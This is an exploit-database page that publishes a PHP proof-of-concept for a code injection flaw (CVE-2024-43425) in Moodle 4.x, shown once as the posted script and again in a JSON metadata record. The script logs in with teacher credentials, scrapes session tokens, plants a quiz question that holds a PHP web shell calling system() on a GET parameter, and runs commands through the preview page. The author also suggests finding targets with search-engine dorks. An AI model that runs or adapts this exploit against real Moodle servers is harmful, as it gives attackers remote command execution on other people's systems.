📄 Moodle 4.x PHP Code Injection_PACKETSTORM:214689

8.1 / 10

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This proof of concept demonstrates a code injection vulnerability in Moodle versions 4.x...

Visit Original Source

Basic Information

ID PACKETSTORM:214689

Published Feb 2, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Moodle 4.x PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://moodle.com/moodle-4/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: (PHP Code Injection Vulnerability) in Moodle (CVE-2024-43425). The module executes commands using command injection through the Moodle quiz question feature.

[+] save code as poc.php .

[+] Set Target : line 8 + 9 + 10

[+] USage : php poc.php

[+] PayLoad :

<?php

//CVE-2024-43425
//https://packetstorm.news/files/id/183003/

// إعدادات الاستغلال
$target = "http://example.com"; // رابط Moodle المستهدف
$username = "teacher";
$password = "password";

// تخزين الكوكيز
$cookie_file = tempnam(sys_get_temp_dir(), "cookies");

// دالة لتنفيذ طلب HTTP عبر cURL
function send_request($url, $post_fields = null, $use_cookie = true) {
global $cookie_file;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
if ($use_cookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
}
if ($post_fields) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
}
$response = curl_exec($ch);
if (curl_errno($ch)) {
die("خطأ في cURL: " . curl_error($ch) . "\n");
}
curl_close($ch);
return $response;
}

// 1. الحصول على `logintoken`
$login_page = send_request("$target/login/index.php", null, false);
preg_match('/name="logintoken" value="(.*?)"/', $login_page, $matches);
$logintoken = $matches[1] ?? die("❌ فشل في الحصول على logintoken\n");

// 2. تسجيل الدخول
$login_data = [
"username" => $username,
"password" => $password,
"logintoken" => $logintoken
];
$response = send_request("$target/login/index.php", $login_data);

// التأكد من نجاح تسجيل الدخول
if (strpos($response, "dashboard") === false) {
die("❌ فشل تسجيل الدخول!\n");
}

// 3. الحصول على `sesskey`
$dashboard = send_request("$target/my/");
preg_match('/"sesskey":"(.*?)"/', $dashboard, $matches);
$sesskey = $matches[1] ?? die("❌ فشل في الحصول على sesskey\n");

// 4. استخراج `courseContextId`
preg_match('/data-contextid="(\d+)"/', $dashboard, $matches);
$courseContextId = $matches[1] ?? die("❌ فشل في الحصول على courseContextId\n");

// 5. إضافة السؤال مع الحمولة (Payload)
$payload = "<p><?php system(escapeshellarg(\$_GET['a'] ?? 'id')); ?></p>";
$question_data = [
"category" => "$courseContextId,1",
"sesskey" => $sesskey,
"qtype" => "calculated",
"name" => "exploit",
"questiontext[text]" => $payload,
"questiontext[format]" => "1",
"submitbutton" => "Save changes"
];
send_request("$target/question/question.php", $question_data);

// 6. تنفيذ الأوامر عبر الطلب GET
$cmd = $_GET['a'] ?? 'id';
$response = send_request("$target/question/preview.php?a=" . urlencode($cmd));

// عرض النتيجة
echo "✅ نتيجة التنفيذ:\n";
echo htmlspecialchars($response);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-02T17:40:36",
    "description": "This proof of concept demonstrates a code injection vulnerability in Moodle versions 4.x...",
    "published": "2026-02-02T00:00:00",
    "modified": "2026-02-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Moodle 4.x PHP Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214689",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-43425"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Moodle 4.x PHP Code Injection Vulnerability                                                                                 |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://moodle.com/moodle-4/                                                                                                |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: (PHP Code Injection Vulnerability) in Moodle (CVE-2024-43425). The module executes commands using command injection through the Moodle quiz question feature.\n    \t\n    [+] save code as poc.php .\n    \n    [+] Set Target : line 8 + 9 + 10\n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    //CVE-2024-43425\n    //https://packetstorm.news/files/id/183003/\n    \n    \n    // \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n    $target = \"http://example.com\"; // \u0631\u0627\u0628\u0637 Moodle \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\n    $username = \"teacher\";\n    $password = \"password\";\n    \n    // \u062a\u062e\u0632\u064a\u0646 \u0627\u0644\u0643\u0648\u0643\u064a\u0632\n    $cookie_file = tempnam(sys_get_temp_dir(), \"cookies\");\n    \n    // \u062f\u0627\u0644\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0637\u0644\u0628 HTTP \u0639\u0628\u0631 cURL\n    function send_request($url, $post_fields = null, $use_cookie = true) {\n        global $cookie_file;\n        \n        $ch = curl_init();\n        curl_setopt($ch, CURLOPT_URL, $url);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\n        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n        if ($use_cookie) {\n            curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);\n            curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);\n        }\n        if ($post_fields) {\n            curl_setopt($ch, CURLOPT_POST, true);\n            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));\n        }\n        $response = curl_exec($ch);\n        if (curl_errno($ch)) {\n            die(\"\u062e\u0637\u0623 \u0641\u064a cURL: \" . curl_error($ch) . \"\\n\");\n        }\n        curl_close($ch);\n        return $response;\n    }\n    \n    // 1. \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 `logintoken`\n    $login_page = send_request(\"$target/login/index.php\", null, false);\n    preg_match('/name=\"logintoken\" value=\"(.*?)\"/', $login_page, $matches);\n    $logintoken = $matches[1] ?? die(\"\u274c \u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 logintoken\\n\");\n    \n    // 2. \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\n    $login_data = [\n        \"username\" => $username,\n        \"password\" => $password,\n        \"logintoken\" => $logintoken\n    ];\n    $response = send_request(\"$target/login/index.php\", $login_data);\n    \n    // \u0627\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u0646\u062c\u0627\u062d \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\n    if (strpos($response, \"dashboard\") === false) {\n        die(\"\u274c \u0641\u0634\u0644 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644!\\n\");\n    }\n    \n    // 3. \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 `sesskey`\n    $dashboard = send_request(\"$target/my/\");\n    preg_match('/\"sesskey\":\"(.*?)\"/', $dashboard, $matches);\n    $sesskey = $matches[1] ?? die(\"\u274c \u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 sesskey\\n\");\n    \n    // 4. \u0627\u0633\u062a\u062e\u0631\u0627\u062c `courseContextId`\n    preg_match('/data-contextid=\"(\\d+)\"/', $dashboard, $matches);\n    $courseContextId = $matches[1] ?? die(\"\u274c \u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 courseContextId\\n\");\n    \n    // 5. \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0633\u0624\u0627\u0644 \u0645\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 (Payload)\n    $payload = \"<p><?php system(escapeshellarg(\\$_GET['a'] ?? 'id')); ?></p>\";\n    $question_data = [\n        \"category\" => \"$courseContextId,1\",\n        \"sesskey\" => $sesskey,\n        \"qtype\" => \"calculated\",\n        \"name\" => \"exploit\",\n        \"questiontext[text]\" => $payload,\n        \"questiontext[format]\" => \"1\",\n        \"submitbutton\" => \"Save changes\"\n    ];\n    send_request(\"$target/question/question.php\", $question_data);\n    \n    // 6. \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0639\u0628\u0631 \u0627\u0644\u0637\u0644\u0628 GET\n    $cmd = $_GET['a'] ?? 'id';\n    $response = send_request(\"$target/question/preview.php?a=\" . urlencode($cmd));\n    \n    // \u0639\u0631\u0636 \u0627\u0644\u0646\u062a\u064a\u062c\u0629\n    echo \"\u2705 \u0646\u062a\u064a\u062c\u0629 \u0627\u0644\u062a\u0646\u0641\u064a\u0630:\\n\";\n    echo htmlspecialchars($response);\n    \n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214689",
    "cvss": {
        "score": 8.1,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214689/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply